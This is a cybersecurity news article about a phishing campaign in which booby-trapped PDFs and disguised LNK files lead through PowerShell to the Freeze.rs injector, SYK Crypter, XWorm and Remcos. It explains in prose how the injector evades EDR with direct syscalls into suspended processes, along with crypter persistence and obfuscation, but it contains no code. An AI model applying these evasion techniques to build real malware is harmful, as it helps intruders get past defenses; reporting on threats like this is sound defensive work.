XWorm, Remcos RAT Evade EDRs to Infect Critical Infrastructure

Disguised as harmless PDF documents, LNK files trigger a PowerShell script, initiating a Rust-based injector called Freeze[.]rs and a host of malware infections.

3 Min Read
A drawing of a skull against a backdrop of computer code
Source: canbedone via Alamy Stock Photo

The Rust-based injector Freeze[.]rs has been weaponized to introduce a raft of malware to targets, in a sophisticated phishing campaign containing a malicious PDF file that gets around endpoint detection and response (EDR).

First discovered by Fortinet's FortiGuard Labs in July, the campaign is targeting victims across Europe and North America, including specialty chemical or industrial product suppliers.

Eventually, this chain culminates in the loading of XWorm malware establishing communication with a command-and-control (C2) server, an analysis by the firm revealed. XWorm can carry out a wide range of functions, from loading ransomware to acting as a persistent backdoor.

Further revelations also unveiled the involvement of SYK Crypter, a tool frequently utilized to distribute malware families via the Discord community chat platform. This crypter played a role in loading Remcos, a sophisticated remote access Trojan (RAT) adept at controlling and monitoring Windows devices.

Putting EDR on Ice: Under the Hood of the Freeze[.]rs Attack Chain

In their investigation, the team's analysis of encoded algorithms and API names traced the origin of this novel injector back to the Red Team tool "Freeze.rs," designed explicitly for crafting payloads capable of bypassing EDR security measures.

"This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," a company blog post explained. "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions."

Cara Lin, researcher, FortiGuard Labs, explains that the Freeze[.]rs injector calls NT syscalls to inject the shellcode, skipping the standard calls that are in Kernel base dll, which may be hooked.

"They use the slight delay that occurs before an EDR starts hooking and altering the assembly of system DLLs within a process," she says. "If a process is created in a suspended state, it has minimal DLLs loaded, and no EDR-specific DLLs are loaded, indicating that the syscalls within Ntdll.dll remain unaltered."

Lin explains the attack chain is initiated through a booby-trapped PDF file, which works together with a "search-ms" protocol to deliver the payload.

This JavaScript code utilized the "search-ms" functionality to reveal the LNK file located on a remote server.

The "search-ms" protocol can redirect users to a remote server via a Windows Explorer Window.

"Through the use of a deceptive LNK file disguised as a PDF icon, it can deceive victims into believing that the file originates from their own system and is legitimate," she notes.

Meanwhile, "the SYK Crypter copies itself to the Startup folder for persistence, encrypts the configuration during encoding and decrypts it upon execution, and also encrypts the compressed payload in the resource‎‎ for obfuscation," she adds.

A downloader is utilized alongside encoding in the first layer and subsequently, a second layer involves string obfuscation and payload encryption.

"This multi-layered strategy is designed to enhance the complexity and challenge for static analysis," she says. "Finally, it can terminate itself upon recognizing a specific security vendor."

How to Defend Against Mounting Phishing Risk

Phishing and other messaging-based attacks continue to be a pervasive threat, with 97% of companies seeing at least one email phishing attack in the past 12 months and three-quarters of firms expecting significant costs from an email-based attack.

Phishing attacks are getting smarter and more targeted, adapting to new technology and user behavior, evolving to include mobile exploits, brand impersonation, and AI-generated content.

The research notes its crucial to maintain up-to-date software to mitigate risks, provide regular training, and use advanced security tools for defenses to counter the evolving threat of phishing attacks.

Phishing simulation training for employees appears to work better at critical infrastructure organizations than it does across other sectors, with 66% of those employees correctly reporting at least one real malicious email attack within a year of training, new research has found.

About the Author(s)

Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like

More Insights